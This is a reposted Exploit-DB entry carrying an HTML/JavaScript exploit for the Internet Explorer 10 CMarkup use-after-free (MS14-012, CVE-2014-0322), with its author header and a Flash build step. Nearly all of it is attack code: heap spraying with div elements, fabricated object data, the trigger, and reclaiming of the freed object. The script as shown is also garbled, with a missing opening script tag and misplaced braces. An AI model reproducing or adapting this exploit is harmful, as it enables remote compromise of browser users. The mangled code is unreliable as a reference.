Microsoft Internet Explorer 10 – CMarkup Use-After-Free (MS14-012) - 体验盒子

作者： Jean-Jamil Khalife

日期： 2014-04-14

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/32851/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

<!--

MS14-012 Internet Explorer CMarkup Use-After-Free

Vendor Homepage: http://www.microsoft.com

Version: IE 10

Date: 2014-03-31

Exploit Author: Jean-Jamil Khalife

Tested on: Windows 7 SP1 x64 (fr, en)

Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)

Home: http://www.hdwsec.fr

Blog : http://www.hdwsec.fr/blog/

MS14-012 / CVE-2014-0322

Generation:

c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf

Exploit-DB Mirror:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32851-AsXploit.as

-->

<html>

<head>

</head>

<body>

var g_arr = [];

var arrLen = 0x250;

function dword2data(dword)

{

var d = Number(dword).toString(16);

while (d.length < 8)

d = '0' + d;

return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));

}

function eXpl()

{

var a=0;

for (a=0; a < arrLen; a++) {

g_arr[a] = document.createElement('div');

}

// Build a new object

var b = dword2data(0x19fffff3);

while (b.length < 0x360)

{

// mov eax,dword ptr [esi+98h]

// ...

// mov eax,dword ptr [eax+8]

// and dword ptr [eax+2F0h],0FFFFFFBFh

if (b.length == (0x98 / 2))

{

b += dword2data(0x1a000010);

}

// mov ecx,dword ptr [edx+94h]

// mov eax,dword ptr [ecx+0Ch]

else if (b.length == (0x94 / 2))

{

b += dword2data(0x1a111111);

}

// mov eax,dword ptr [edx+15Ch]

// mov ecx,dword ptr [eax+edx*8]

else if (b.length == (0x15c / 2))

{

b += dword2data(0x42424242);

}

else

{

b += dword2data(0x19fffff3);

}

var d = b.substring(0, ( 0x340 - 2 )/2);

// trigger

try{

this.outerHTML=this.outerHTML

}

catch(e){

}

CollectGarbage();

// Replace freed object

for (a=0; a < arrLen; a++)

{

g_arr[a].title = d.substring(0, d.length);

}

// Trigger the vulnerability

function trigger()

{

var a = document.getElementsByTagName("script");

var b = a[0];

b.onpropertychange = eXpl;

var c = document.createElement('SELECT');

c = b.appendChild(c);

}

</script>

</body>

</html>